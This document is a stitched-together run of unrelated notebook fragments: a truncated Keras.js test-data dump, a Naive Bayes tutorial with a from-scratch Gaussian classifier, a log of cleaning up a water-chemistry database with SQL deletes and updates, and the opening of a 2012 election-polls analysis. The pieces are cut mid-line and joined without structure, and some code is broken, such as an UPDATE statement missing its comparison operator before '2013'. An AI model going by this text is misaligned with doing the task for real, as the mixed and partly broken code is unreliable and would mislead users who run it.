0.872647, 0.540013, 0.055422, 0.322167, 0.972206, 0.92596, -0.82368, -0.63508, 0.671616, -0.678809, 0.202761, -0.260164, -0.241878, 0.188534, -0.47291, -0.077436, -0.016304, 0.548747, -0.236224, -0.780147, -0.013071, -0.67362, -0.807763, -0.351361, 0.533701, 0.274553, -0.933379, -0.49029, 0.928012, -0.719924, 0.453519, 0.173223, 0.030778, 0.12229, 0.547074, -0.860491, 0.206434, 0.248515, -0.189106, -0.393127, -0.152128, -0.822508, -0.361768, -0.702917, 0.998304, -0.011396, -0.644766, -0.150506, -0.153633, -0.772981, -0.470261, -0.056372, 0.082635, 0.017418, 0.26302, 0.730468, 0.268813, -0.163174, 0.332229, -0.698119, -0.3[...]export for Keras.js testsprint(json.dumps(DATA)){"pooling.AveragePooling3D.0": {"input": {"data": [-0.453175, -0.475078, 0.486234, -0.949643, -0.349099, -0.837108, 0.933439, 0.167853, -0.995191, 0.459466, -0.788337, -0.120985, 0.06215, 0.138625, -0.102201, 0.976605, -0.591051, -0.592066, 0.469334, -0.435067, 0.621416, 0.817698, 0.790015, 0.485862, 0.469679, -0.611443, 0.582845, -0.503885, -0.379174, -0.451035, 0.052289, 0.131836, -0.609312, -0.828722, -0.422428, -0.648754, -0.339801, -0.758017, 0.754244, -0.544823, 0.691656, 0.076848, -0.32539, 0.306448, -0.662415, 0.334329, 0.030666, -0.414111, -0.757096, -0.20427, -0.893088, -0.681919, -0.619269, -0.640749, 0.867436, 0.971453, -0.42039, -0.574905, -0.34642, 0.588678, -0.247265, 0.436084, 0.220126, 0.114202, 0.613623, 0.401452, -0.270262, -0.591146, -0.872383, 0.818368, 0.336808, 0.338197, -0.275646, 0.375308, -0.928722, -0.836727, -0.504007, -0.503397, -0.636099, 0.948482, -0.639661, -0.026878, -0.122643, -0.634018, -0.247016, 0.517246, -0.398639, 0.752174, -0.014633, -0.170534, -[...]Naive BayesWe have vectorised our lyrics corpus using Bag of Words. How can we run predictions on that? - Using Naive Bayes!Naive Bayes are their own family of Machine Learning modelling - Bayes means it belongs to a group that gives you probability scores!They are very useful and have lots of functions: we can introduce thresholds to say only show us results only where you are really sure!- Based on Bayes' Theorem - it **describes the probability of an event, based on prior knowledge of conditions that might be related to the event.** For example, if cancer is related to age, then, using Bayes' theorem, a person's age can be used to more accurately assess the probability that they have cancer, compared to the assessment of the probability of cancer made without knowledge of the person's age. What is a prior?- A prior is the assumed probability of an event before taking any data into account.For instance, if we look at the word “yeah” in documents, we would expect it to occur with the average frequency over all documents, before looking at an individual document. The probability associated with the average frequency is the prior of “yeah”.Naive Bayes - what we want to calculate: p(doc|A) x p(A) <---- Prior - this is the probability -> p (A|doc) = _____________________ | p(B) <---- Marginal probability - has a nice property: | We can ignore it! We're not interested in | absolute probability, we just want to know Posterior Probability probability of Eminem v Madonna \begin{align}P(doc|A) = P({W_1}|A) . 
P({W_2}|A) ...\end{align} Naive Bayes Probabilistic ModelIn plain English, using Bayesian probability terminology, the above equation can be written as\begin{align}Posterior = \frac{prior * likelihood}{evidence}\end{align} **The posterior probability is the probability after looking at the data.** Bayes' theorem is stated mathematically as the following equation:\begin{align}\displaystyle P(A\mid B)={\frac {P(B\mid A)\,P(A)}{P(B)}}\end{align} where A and B are events and P(B) not equal to 0- P(A|B) is a conditional probability: the likelihood of event A occurring given that B is true.- P(B|A) is also a conditional probability: the likelihood of event B occurring given that A is true.- P(A) and P(B) are the probabilities of observing A and B independently of each other; this is known as the marginal probability.This might be too abstract, so let us replace some of the variables to make it more concrete. In a bayes classifier, we are interested in finding out the class (e.g. male or female, spam or ham) of an observation given the data:\begin{align}P(class|data) = \frac {P(data|class)∗P(class)}{P(data)}\end{align} Here, **P(class) is the prior**. **P(data) is called the marginal probability**. In a classifier, we **can usually ignore the latter**, because we **only need to know the ratio between the classes.**- class is a particular class (e.g. male)- data is an observation’s data- p(class | data) is called the posterior- p(data | class) is called the likelihood- p(class) is called the prior- p(data) is called the marginal probability The Bayes ErrorIf we knew the underlying distribution of the data, we could build a perfect Bayesian model. Even then, there would be a residual error due to noise in the data. We call this the **Bayes Error**. Advantages:- fast- accurate- probability scores given- works well even under small data- often very intuitive Disadvantages:- Overfitting - you'll often have to optimise the hyperparameter alpha and this can be quite difficult - Can try and optimise that using GridSearch or TPOT(mentioned there's an issue here for Naive Bayes)- Computationally costly in large data- A prior must be chosen Naive Bayes Classifier From Scratch - Copyright © , 2020 Create DataOur dataset is contains data on eight individuals. We will use the dataset to construct a classifier that takes in the height, weight, and foot size of an individual and outputs a prediction for their gender.import pandas as pd import numpy as np # Create an empty dataframe data = pd.DataFrame() # Create our target variable data['Gender'] = ['male','male','male','male','female','female','female','female'] # Create our feature variables data['Height'] = [6,5.92,5.58,5.92,5,5.5,5.42,5.75] data['Weight'] = [180,190,170,165,100,150,130,150] data['Foot_Size'] = [12,11,12,10,6,8,7,9] # View the data dataThe dataset above is used to construct our classifier. Below we will create a new person for whom we know their feature values but not their gender. Our goal is to predict their gender.# Create an empty dataframe person = pd.DataFrame() # Create some feature values for this single row person['Height'] = [6] person['Weight'] = [130] person['Foot_Size'] = [8] # View the data personIn a bayes classifier, we calculate the posterior (technically we only calculate the numerator of the posterior, but ignore that for now) for every class for each observation. Then, classify the observation based on the class with the largest posterior value. 
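As a minimal, self-contained sketch of that decision rule (the class labels and numerator values below are invented for illustration, not computed from this dataset):

```python
# Hypothetical posterior numerators (prior * likelihood) for two classes.
# In practice these values come from the calculations developed below.
posterior_numerators = {'male': 6.2e-09, 'female': 5.4e-04}

# Classify by picking the class with the largest numerator.
predicted = max(posterior_numerators, key=posterior_numerators.get)
print(predicted)  # -> 'female' for these invented numbers
```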
In our example, we have one observation to predict and two possible classes (e.g. male and female), therefore we will calculate two posteriors: one for male and one for female.\begin{align}p(\text{person is male} \mid \mathbf {\text{person’s data}} )={\frac {p(\mathbf {\text{person’s data}} \mid \text{person is male}) * p(\text{person is male})}{p(\mathbf {\text{person’s data}} )}}\end{align}\begin{align}p(\text{person is female} \mid \mathbf {\text{person’s data}} )={\frac {p(\mathbf {\text{person’s data}} \mid \text{person is female}) * p(\text{person is female})}{p(\mathbf {\text{person’s data}} )}}\end{align} Gaussian Naive Bayes ClassifierA gaussian naive bayes is probably the most popular type of bayes classifier. To explain what the name means, let us look at what the bayes equations looks like when we apply our two classes (male and female) and three feature variables (height, weight, and footsize):\begin{align}{\displaystyle {\text{posterior (male)}}={\frac {P({\text{male}})\,p({\text{height}}\mid{\text{male}})\,p({\text{weight}}\mid{\text{male}})\,p({\text{foot size}}\mid{\text{male}})}{\text{marginal probability}}}}\end{align}\begin{align}{\displaystyle {\text{posterior (female)}}={\frac {P({\text{female}})\,p({\text{height}}\mid{\text{female}})\,p({\text{weight}}\mid{\text{female}})\,p({\text{foot size}}\mid{\text{female}})}{\text{marginal probability}}}}\end{align} Now let us unpack the top equation a bit:- P(male) is the prior probabilities. It is, as you can see, simply the probability an observation is male. This is just the number of males in the dataset divided by the total number of people in the dataset.- p(height∣female)p(weight∣female)p(foot size∣female) is the likelihood. Notice that we have unpacked `person’s data` so it is now every feature in the dataset. The “gaussian” and “naive” come from two assumptions present in this likelihood: 1. If you look each term in the likelihood you will notice that we assume each feature is uncorrelated from each other. That is, foot size is independent of weight or height etc.. This is obviously not true, and is a “naive” assumption - hence the name “naive bayes.” 2. Second, we assume have that the value of the features (e.g. the height of women, the weight of women) are normally (gaussian) distributed. This means that p(height∣female) is calculated by inputing the required parameters into the probability density function of the normal distribution: \begin{align}p(\text{height}\mid\text{female})=\frac{1}{\sqrt{2\pi\text{variance of female height in the data}}}\,e^{ -\frac{(\text{observation’s height}-\text{average height of females in the data})^2}{2\text{variance of female height in the data}} }\end{align}- **marginal probability** - is probably one of the most confusing parts of bayesian approaches. In toy examples (including ours) it is completely possible to calculate the marginal probability. However, in many real-world cases, it is either extremely difficult or impossible to find the value of the marginal probability (explaining why is beyond the scope of this tutorial). This is not as much of a problem for our classifier as you might think. Why? Because we don’t care what the true posterior value is, we only care which class has a the highest posterior value. And because the marginal probability is the same for all classes 1) we can ignore the denominator, 2) calculate only the posterior’s numerator for each class, and 3) pick the largest numerator. 
That is, we can ignore the posterior’s denominator and make a prediction solely on the relative values of the posterior’s numerator.  Calculate PriorsPriors can be either constants or probability distributions. In our example, this is simply the probability of being a gender. Calculating this is simple:# Number of males n_male = data['Gender'][data['Gender'] == 'male'].count() # Number of males n_female = data['Gender'][data['Gender'] == 'female'].count() # Total rows total_ppl = data['Gender'].count() n_female total_ppl # Number of males divided by the total rows P_male = n_male/total_ppl # Number of females divided by the total rows P_female = n_female/total_ppl P_maleCalculate LikelihoodRemember that each term (e.g. p(height∣female)) in our likelihood is assumed to be a normal pdf. For example:\begin{align}p(\text{height}\mid\text{female})=\frac{1}{\sqrt{2\pi\text{variance of female height in the data}}}\,e^{ -\frac{(\text{observation’s height}-\text{average height of females in the data})^2}{2\text{variance of female height in the data}} }\end{align}This means that for each class (e.g. female) and feature (e.g. height) combination we need to calculate the variance and mean value from the data. Pandas makes this easy:# Group the data by gender and calculate the means of each feature data_means = data.groupby('Gender').mean() # View the values data_means # Group the data by gender and calculate the variance of each feature data_variance = data.groupby('Gender').var() # View the values data_varianceNow we can create all the variables we need. The code below might look complex but all we are doing is creating a variable out of each cell in both of the tables above.# Means for male male_height_mean = data_means['Height'][data_variance.index == 'male'].values[0] male_weight_mean = data_means['Weight'][data_variance.index == 'male'].values[0] male_footsize_mean = data_means['Foot_Size'][data_variance.index == 'male'].values[0] # Variance for male male_height_variance = data_variance['Height'][data_variance.index == 'male'].values[0] male_weight_variance = data_variance['Weight'][data_variance.index == 'male'].values[0] male_footsize_variance = data_variance['Foot_Size'][data_variance.index == 'male'].values[0] # Means for female female_height_mean = data_means['Height'][data_variance.index == 'female'].values[0] female_weight_mean = data_means['Weight'][data_variance.index == 'female'].values[0] female_footsize_mean = data_means['Foot_Size'][data_variance.index == 'female'].values[0] # Variance for female female_height_variance = data_variance['Height'][data_variance.index == 'female'].values[0] female_weight_variance = data_variance['Weight'][data_variance.index == 'female'].values[0] female_footsize_variance = data_variance['Foot_Size'][data_variance.index == 'female'].values[0]Finally, we need to create a function to calculate the probability density of each of the terms of the likelihood (e.g. p(height|female)).# Create a function that calculates p(x | y): def p_x_given_y(x, mean_y, variance_y): # Input the arguments into a probability density function p = 1/(np.sqrt(2*np.pi*variance_y)) * np.exp((-(x-mean_y)**2)/(2*variance_y)) # return p return pApply Bayes Classifier To New Data PointAlright, our bayes classifier is ready. 
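As a quick, optional sanity check of `p_x_given_y` (this assumes the means and variances computed above; it is not part of the original notebook): evaluating the density at the class mean zeroes the exponent, so the result should equal the peak value 1/sqrt(2*pi*variance).

```python
# Sanity check: the density evaluated at the mean should equal its peak value.
# Assumes male_height_mean and male_height_variance defined in the cells above.
peak = p_x_given_y(male_height_mean, male_height_mean, male_height_variance)
print(peak)
print(1 / np.sqrt(2 * np.pi * male_height_variance))  # should print the same number
```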
Remember that since we can ignore the marginal probability (the demoninator), what we are actually calculating is this:\begin{align}{\displaystyle {\text{numerator of the posterior}}={P({\text{female}})\,p({\text{height}}\mid{\text{female}})\,p({\text{weight}}\mid{\text{female}})\,p({\text{foot size}}\mid{\text{female}})}{}}\end{align}To do this, we just need to plug in the values of the unclassified person (height = 6), the variables of the dataset (e.g. mean of female height), and the function (p_x_given_y) we made above:# Numerator of the posterior if the unclassified observation is a male P_male * \ p_x_given_y(person['Height'][0], male_height_mean, male_height_variance) * \ p_x_given_y(person['Weight'][0], male_weight_mean, male_weight_variance) * \ p_x_given_y(person['Foot_Size'][0], male_footsize_mean, male_footsize_variance) # Numerator of the posterior if the unclassified observation is a female P_female * \ p_x_given_y(person['Height'][0], female_height_mean, female_height_variance) * \ p_x_given_y(person['Weight'][0], female_weight_mean, female_weight_variance) * \ p_x_given_y(person['Foot_Size'][0], female_footsize_mean, female_footsize_variance)TOC trends 2015: database clean-up (part 2)This notebook continues the work detailed [here](http://nbviewer.jupyter.org/url/www.googledrive.com/host/0BximeC_RweaeUy1jd2k3Nm1kdms/toc_trends_2015_data_cleaning.ipynb).It also describes my follow-up to the 2016 call for data, which has highlighted a few more issues that need correcting. 1. Distance to coastIn the previous notebook I calculated distance to coast values, but I haven't yet added them to RESA2. Begin by defining a new parameter (`var_id = 319`) in `RESA2.STATION_PARAMETER_DEFINITIONS`. Next I need to restructure the distance information.# Read distances to coastline table dist_csv = (r'C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015' r'\Data\distance_to_coast.csv') dist_df = pd.read_csv(dist_csv) # Restructure columns to [stn_id, var_id, value, entered_by, entered_date] dist_df['VALUE'] = dist_df['distance_m'] / 1000. dist_df['STATION_ID'] = dist_df['station_id'] dist_df['VAR_ID'] = 319 dist_df['ENTERED_BY'] = 'JES' dist_df['ENTERED_DATE'] = '28.06.2016' dist_df = dist_df[['STATION_ID', 'VAR_ID', 'VALUE', 'ENTERED_BY', 'ENTERED_DATE']] # Save to file out_csv = (r'C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015' r'\Data\distance_to_coast_upload.csv') dist_df.to_csv(out_csv, index=False) dist_df.head()The file `distance_to_coast_upload.csv` has now been uploaded to the database via Access. 2. Norway sitesI had a short meeting with Heleen on 28/06/2016 to discuss metadata for the Norwegian sites. There are 7 Norwegian sites in the main ICPW project, but 83 in the wider TOC trends analysis. Note the following: * Table 2 of Heleen's [2008 HESS paper](http://www.hydrol-earth-syst-sci.net/12/393/2008/hess-12-393-2008.pdf) gives basic land use proportions for four sites (Birkenes, Storgama, Langtjern and Kårvatn) that currently have incomplete data in RESA2. Translating this information into the land use classes in RESA2 gives the proportions shown in the table below. I've saved these values in `heleen_hess2008_land_use.xlsx` and uploaded them to the database. **NB:** I'm assuming transitional woodland is a **sub-set** of total forest area. **NB2:** Land use proportions are structured strangely in the database, with some of them attached directly to the `stations` table. This isn't ideal. 
In particular, note that the column named `CATCHMENT_WATER_AREA` actually corresponds to `var_id 23 (Water area excl. lake)` and not `var_id 318 (Water)`, as might be expected. | Station name | Total forest area | Deciduous area | Coniferous area | Peat area | Bare rock | Transitional woodland/scrub | Water ||:------------:|:-----------------:|:--------------:|:---------------:|:---------:|:---------:|:---------------------------:|:-----:|| Birkenes | 90 | 10 | 80 | 7 | 3 | 0 | 0 || Langtjern | 67 | | | 25 | 3 | | 5 || Kårvatn | 18 | | | 2 | 76 | | 4 || Storgama | 11 | 0 | 0 | 22 | 59 | 11 | 8 | * Heleen has suggested that might have land use proportions for (some of) the 83 Norwegian sites in the trends analysis. See Heleen's e-mail from 28/06/2016 at 09:56. * Heleen has suggested that Espen Lund or Øyvind Garmo might have shapefiles (or land use or mean elevation data) for the 7 Norwegian "feltforskningssstasjoner" (which are the sites missing elevation data mentioned in my previous notebook). She has also suggested that the [new NVE webservice](http://nevina.nve.no/) might allow catchment delineation - see e-mail received 28/06/2016 at 09:40. The NVE webservice is an impressive system, although it's very slow. It does allow generation of shapefiles, though, including land use proportions and median (not mean) elevation statistics. A test run for Birkenes yields 98% woodland cover and a median height of 226 m. These land use proportions don't agree exactly with what's given above, but I can certainly use this for estimating median elevations for the 7 Norwegian sites, which I'll assume can also be used as means as far as the database is concerned. Unfortunately, **one of the sites (Storgama) is so small it is below the resolution of the NVE web service**. Data for the other 6 is summarised in `nevina_catch_props.xlsx`. I've used these median elevation values to update the database.# Read NIVINA results table nev_xlsx = (r'C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015' r'\Data\correct_norway\nevina_shapefiles\nevina_catch_props.xlsx') nev_df = pd.read_excel(nev_xlsx, sheetname='data') nev_dfFor Storgama, I can't generate an exact catchment, but I can get a slightly bigger catchment based on an outflow point a little downstream. The map below shows the approximate location of the actual sampling point (yellow), overlaid on a catchment defined from the nearest point accessible via the NEVINA system (red). The larger catchment boundary has an area of $0.85 \; km^2$, compared to $0.6 \; km^2$ upstream of the yellow dot. However, the vast majority of the additional area is located at a lower elevation than the "true" catchment I'm interested in. I can use this fact to estimate the median elevation for the catchment above the yellow dot: * The elevations in NEVINA are most likely derived from a DEM i.e. a regular grid with a direct correlation between catchment area and number of cells enclosed (= number of elevation values). * To get from the "red" catchment to the desired "yellow" catchment, I therefore need to disregard $\frac{0.25}{0.8} \approx 30\%$ of the catchment area. If I assume this is the lower 30% of the catchment (which is roughly correct looking at the contours), this is the same as throwing away 30% of the DEM cells i.e. the lower 30% of elevation values. Under these assumptions, the median elevation for the smaller (yellow) catchment should be approximately equal to the $30 + \frac{100 - 30}{2} = 65th$ percentile elevation of the larger catchment. 
* I'll round this up and use the 70th percentile of the derived catchment from NEVINA to approximate the median elevation at Storgama. **This gives a value of 626 m, which I've added to RESA2**.**Update 01/07/2016**The land use proportions used by Anders are based on CORINE and are therefore not suitable - see e-mails from (28/06/2016 at 21:09), (29/06/2016 at 08:45) and Heleen (29/06/2016 at 09:53). It therefore seems that detailed land use proportions are not available. Heleen has suggested that I could derive them based on catchment boundaries (already delineated by Tore?) and the Norwegian 1:50k scale land use maps (are these digitised?). See e-mail from Heleen sent 29/06/2016 at 16:08. Heleen has suggested that this job is low priority for the moment, though. 3. Czech sitesAfter sending out the 2016 call for data for the basic ICPW sites, Jakub responded to say one of the Czech sites seemed to be incorrectly named. In following this up, it turns out data from several different sites have been merged together - see e-mails from Jakub and Vladimir e.g. 29/06/2016 at 10:58.This is going to take a bit of tidying up. One option is to delete all the Czech data from the database and then upload it again, but I'd like to avoid this if possible. Another issue is the Czech data include multiple datasets for the same site: Lysina (CZ07) has both monthly and weekly sampling, but only the monthly dataset is part of ICPW, whereas the weekly dataset is used for the DOC trends analysis (i.e. each series should really be assigned to a different project). Unfortunately, RESA2 has not been designed to allow different sampling and analysis protocols at the same site. The best I can do without restructuring the database is to have duplicate sites (e.g. `Lysina_Weekly` and `Lysina_Monthly`), but in general this is not a good idea as it breaks the principle of **database normalisation**, which could lead to problems later. This is actually a fundamental weakness of the RESA2 database and it's something we should **look at more carefully in the future**. For the Czech data, some manual checking shows that the monthly dataset for Lysina is actually just a subset of the weekly data, so in this case it makes sense to keep everything together as a single dataset for now. We'll need to be a little bit careful with this, though, as I get the impression **Jakub doesn't want the weekly data to be available via ICPW**. For the moment, the key issues to address are: * The current site CZ08 should be Uhlirska (not Pluhuv Bor) and the site properties needs correcting. * The weekly data for Pluhuv Bor need moving to a new site (CZ09?), which should be associated with the DOC trends project (but not the main ICPW project). To help work out what data belongs where, see e-mails from Jakub (29/06/2016 at 10:58) and Vladimir (29/06/2016 at 14:20). Begin by making Pluhuv Bor site CZ09 and changing CZ08 back to Uhlirska. The site properties for Uhlirska are available here:K:\Prosjekter\langtransporterte forurensninger\O-23300 - ICP-WATERS - HWI\Tilsendte data fra Focalsentere\CzechRepublic\Innsendt2008\CZ_Innsendt 21 mars 08_Uhlirska_CZ_ICP_011193_061106.xlsThe next step is to try to separate the Pluhuv Bor data from the Uhlirska data. This could be difficult, but to begin with I can try to do it by matching dates. The fileC:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015\Data\correct_czech\pluhuv_bor_wrong_code.xlscontains the weekly data for Pluhuv Bor, incorrectly labelled as site CZ08. 
If I can select just these records from the database and change the site code to CZ09, this should solve the problem. Note that this will only work as long as the sampling dates between Uhlirska and Pluhuv Bor are always different (i.e. they've never been sampled on the same day). To check this, I've copied all the dates I can find for the real Uhlirska into a new Excel file called `uhlirska_sampliong_dates.xlsx`. These can then be compared to the dates in the file above for Pluhuv Bor.# Read data plu_path = (r'C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015' r'\Data\correct_czech\pluhuv_bor_wrong_code.xls') uhl_path = (r'C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015' r'\Data\correct_czech\uhlirska_sampling_dates.xlsx') plu_df = pd.read_excel(plu_path, sheetname='Data') uhl_df = pd.read_excel(uhl_path, sheetname='Sheet1') # Check for duplicated dates print uhl_df.duplicated('Date').sum() print plu_df.duplicated('Date').sum() # Get the intersection set(uhl_df['Date']).intersection(set(plu_df['Date']))0 39So - unfortuantely - there *are* matching dates between the two sites, so using date alone isn't going to work. The only other option I can think of (other than starting again) is to upload the Pluhuv Bor data from scratch using the code CZ09, and then search through the data for CZ08, remvoing any records that are the same. Tore's tidied data for Pluhuv Bor (incorrectly labelled as CZ08) are here:K:\Prosjekter\langtransporterte forurensninger\O-23300 - ICP-WATERS - HWI\Tilsendte data fra Focalsentere\CzechRepublic\Innsendt2015\ICPCZ90-12ALLed.xlsI've copied this to a new file called *pluhuv_bor_weekly.xlsx*, removed the data for the other sites and then changed the site code to CZ09. Unfortunately, my attempts to upload this data to RESA2 via Access have failed. I'm not sure what the problem is, but the Access connection keeps timing out. To get around this, I've written my own basic code for uploading ICPW templates, which is here:C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\Upload_Template\upload_icpw_template.ipynbI have used this code to upload the (hopefully correct) data for Pluhuv Bor as site CZ09. The next step is to try to identify the records in the Uhlirska series that actually belong to Pluhuv Bor. 
I can't do this purely based upon date, but hopefully I can using date *and* method *and* value.# Create and test a db connection # Use custom RESA2 function to connect to db r2_func_path = r'C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\Upload_Template\useful_resa2_code.py' resa2 = imp.load_source('useful_resa2_code', r2_func_path) engine, conn = resa2.connect_to_resa2() # Test SQL statement sql = ('SELECT project_id, project_number, project_name ' 'FROM resa2.projects') df = pd.read_sql_query(sql, engine) df.head(10) # Get all water chem results currently in db for Uhlirska and Pluhuv Bor # Uhlirska sql = ("SELECT * FROM RESA2.WATER_CHEMISTRY_VALUES2 " "WHERE SAMPLE_ID IN (SELECT WATER_SAMPLE_ID " "FROM RESA2.WATER_SAMPLES " "WHERE STATION_ID = 37745)") uhl_df = pd.read_sql_query(sql, engine) # Pluhuv Bor sql = ("SELECT * FROM RESA2.WATER_CHEMISTRY_VALUES2 " "WHERE SAMPLE_ID IN (SELECT WATER_SAMPLE_ID " "FROM RESA2.WATER_SAMPLES " "WHERE STATION_ID = 33326)") plu_df = pd.read_sql_query(sql, engine) # Get sample dates sql = ("SELECT WATER_SAMPLE_ID, SAMPLE_DATE " "FROM RESA2.WATER_SAMPLES " "WHERE STATION_ID IN (33326, 37745)") sam_df = pd.read_sql_query(sql, engine) # Join dates to each site uhl_df = pd.merge(uhl_df, sam_df, how='left', left_on='sample_id', right_on='water_sample_id') uhl_df = uhl_df[['value_id', 'sample_date', 'sample_id', 'method_id', 'value', 'flag1']] plu_df = pd.merge(plu_df, sam_df, how='left', left_on='sample_id', right_on='water_sample_id') plu_df = plu_df[['value_id', 'sample_date', 'sample_id', 'method_id', 'value', 'flag1']] print 'Number of records for Pluhuv Bor: %s.' % len(plu_df) print 'Number of records for Uhlirska: %s.' % len(uhl_df) plu_df.head()Number of records for Pluhuv Bor: 14756. Number of records for Uhlirska: 18090.We can now work through all the entries in `plu_df`, testing to see if the dates, methods, values and flags match those in `uhl_df`. If they do, it's likely this is a duplicate that should be deleted from the Uhlirska series. Looking at the length of each series shown above, we might expect to find $(18090 - 14756) = 3334$ duplicates.# Round the value column to 2 decimal places uhl_df['value2'] = uhl_df['value'].round(2) plu_df['value2'] = plu_df['value'].round(2) # Join join_df = pd.merge(uhl_df, plu_df, how='left', left_on=['sample_date', 'method_id', 'value2', 'flag1'], right_on=['sample_date', 'method_id', 'value2', 'flag1']) print len(join_df) print pd.notnull(join_df['value_y']).sum() join_df.head(10)18090 13381Unfortunately, rounding differences in the way the data has been uploaded previously mean that I am unable to match based on values, which is crucial for this method to work reliably (see record 9 in the dataframe above). Unfortunately, I think the only option is therefore to **upload all the data for Uhlirska again**.I've copied all the monthly Uhlirska data to a new Excel file here:C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015\Data\correct_czech\uhlirska_monthly.xlsxI can now drop all the samples associated with this site from the database and upload the data again. Let's hope this works! The following SQL deletes the records. Note that care needs to be taken with some of the constraints.First delete from `RESA2.WATER_CHEMISTRY_VALUES`: DELETE FROM RESA2.WATER_CHEMISTRY_VALUES2 WHERE sample_id IN (SELECT water_sample_id FROM RESA2.WATER_SAMPLES WHERE STATION_ID = 37745); There is also a table called `RESA2.SAMPLE_SELECTIONS` that links water samples to projects. 
The Czech ICPW project has `PROJECT_ID=2986`. I'm not sure whether these need to be added again afterwards - as far as I can tell, the upload procedure for ICPW doesn't add records to this table. **Bear this in mind though: if you run into problems later, you need to add records to this table for the samples from sites CZ08 and CZ09. If you do this, the `SAMPLE_SELECTION_ID` should equal 52, which corresponds to `PROJECT_ID` 2986 in the `SAMPLE_SELECTION_DEFINITIONS` table**. DELETE FROM RESA2.SAMPLE_SELECTIONS WHERE water_sample_id IN (SELECT water_sample_id FROM RESA2.WATER_SAMPLES WHERE STATION_ID = 37745); Finally, we can delete from the `WATER_SAMPLES` table: DELETE FROM RESA2.WATER_SAMPLES WHERE STATION_ID = 37745; Having committed these changes, I can now upload the Uhlirska data again using the notebook and spreadsheet linked above.I have also uploaded new data for sites CZ01 to CZ07, as given in the spreadsheet sent by Vladimir on 29/06/2016 at 14:20. Samples for these 7 sites that are not already included in the database have been copied here:C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\Call_for_Data_2016\Replies\czech_republic\ICPDataCZ2016.xlsand then uploaded.Finally, I have moved site CZ09 (Pluhuv Bor) from the `ICPWaters CZ` project to the `ICPW_TOCTRENDS_2015_CZ` project, as requested by Jakub. 3.2. Check silica valuesOne final issue with the Czech sites concerns the values reported for silica. Due to an ambiguity in the input template, the Czechs have not always reported their units correctly - see e-mail from Vladimir received 01/07/2016 at 11:06 for details.The overall conclusion is that the units will need changing for particular silica samples. First, let's plot the data to see if there are any obvious issues, other than those already identified by Vladimir. Iæve already written some convenience plotting functions for RESA2, which can hopefully be used here.# Specify sites and parameters of interest stn_list = ['CZ01', 'CZ02', 'CZ03', 'CZ04', 'CZ05', 'CZ06', 'CZ07', 'CZ08', 'CZ09'] par_list = ['SiO2',] # Period of interest st_dt = '1980-01-01' # yyyy-mm-dd end_dt = '2015-12-31' # yyyy-mm-dd # Create plots resa2.plot_resa2_ts(stn_list, par_list, st_dt, end_dt)It seems pretty clear from the above plots that something strange is happening with silica in the latter part of the records. Most of the lake sites (CZ01 to CZ06) show a dip in 2007 that could suggest $Si$ being reported as $SiO_2$. These same lakes show a distinctive peak from around 2010 onwards (but with a dip in 2013), which could be $SiO_2$ reported as $Si$. Vladimir's e-mail focuses on the data collected since 02/08/2010. He says all the silica values have actually been reported as $SiO_2$ (*not* $Si$ as stated in his spreadsheet), ***except*** for the measurements during 2013 which are actually $Si$. This probably explains the anomalous pattern observed above. To correct these problems, I need to change the `method_id` for all the silica measurements from sites CZ01 to CZ06 inclusive for the period since 02/08/2010 (but excluding those collected during 2013). The `method_id` needs changing from `10289` (for $Si$) to `10270` (for $SiO_2$). 
This is done by the following SQL UPDATE RESA2.WATER_CHEMISTRY_VALUES2 SET METHOD_ID = 10270 WHERE SAMPLE_ID IN (SELECT WATER_SAMPLE_ID FROM RESA2.WATER_SAMPLES WHERE STATION_ID IN (SELECT STATION_ID FROM RESA2.STATIONS WHERE STATION_CODE IN ('CZ01', 'CZ02', 'CZ03', 'CZ04', 'CZ05', 'CZ06')) AND RESA2.WATER_SAMPLES.SAMPLE_DATE >= DATE '2010-08-02' AND EXTRACT(YEAR FROM SAMPLE_DATE) 2013) AND RESA2.WATER_CHEMISTRY_VALUES2.METHOD_ID = 10289;Re-running the code above, the plots now look like this:# Create plots resa2.plot_resa2_ts(stn_list, par_list, st_dt, end_dt)Election Data Project - Polls and DonorsIn this Data Project we will be looking at data from the 2012 election.In this project we will analyze two datasets. The first data set will be the results of political polls. We will analyze this aggregated poll data and answer some questions: 1.) Who was being polled and what was their party affiliation? 2.) Did the poll results favor Romney or Obama? 3.) How do undecided voters effect the poll? 4.) Can we account for the undecided voters? 5.) How did voter sentiment change over time? 6.) Can we see an effect in the polls from the debates?We'll discuss the second data set later on! Let's go ahead and start with our standard imports:# For data import pandas as pd from pandas import Series,DataFrame import numpy as np # For visualization import matplotlib.pyplot as plt import seaborn as sns sns.set_style('whitegrid') %matplotlib inline from __future__ import divisionThe data for the polls will be obtained from HuffPost Pollster. You can check their website [here](http://elections.huffingtonpost.com/pollster). There are some pretty awesome politcal data stes to play with there so I encourage you to go and mess around with it yourself after completing this project. We're going to use the requests module to import some data from the web. For more information on requests, check out the documentation [here](http://docs.python-requests.org/en/latest/).We will also be using StringIO to work with csv data we get from HuffPost. StringIO provides a convenient means of working with text in memory using the file API, find out more about it [here](http://pymotw.com/2/StringIO/)# Use to grab data from the web(HTTP capabilities) import requests # We'll also use StringIO to work with the csv file, the DataFrame will require a .read() method from StringIO import StringIO # This is the url link for the poll data in csv form url = "http://elections.huffingtonpost.com/pollster/2012-general-election-romney-vs-obama.csv" # Use requests to get the information in text form source = requests.get(url).text # Use StringIO to avoid an IO error with pandas poll_data = StringIO(source)Now that we have our data, we can set it as a DataFrame.# Set poll data as pandas DataFrame poll_df = pd.read_csv(poll_data) # Let's get a glimpse at the data poll_df.info() Int64Index: 589 entries, 0 to 588 Data columns (total 14 columns): Pollster 589 non-null object Start Date 589 non-null object End Date 589 non-null object Entry Date/Time (ET) 589 non-null object Number of Observations 567 non-null float64 Population 589 non-null object Mode 589 non-null object Obama 589 non-null int64 Romney 589 non-null int64 Undecided 422 non-null float64 Pollster URL 589 non-null object Source URL 587 non-null object Partisan 589 non-null object Affiliation 589 non-null object dtypes: 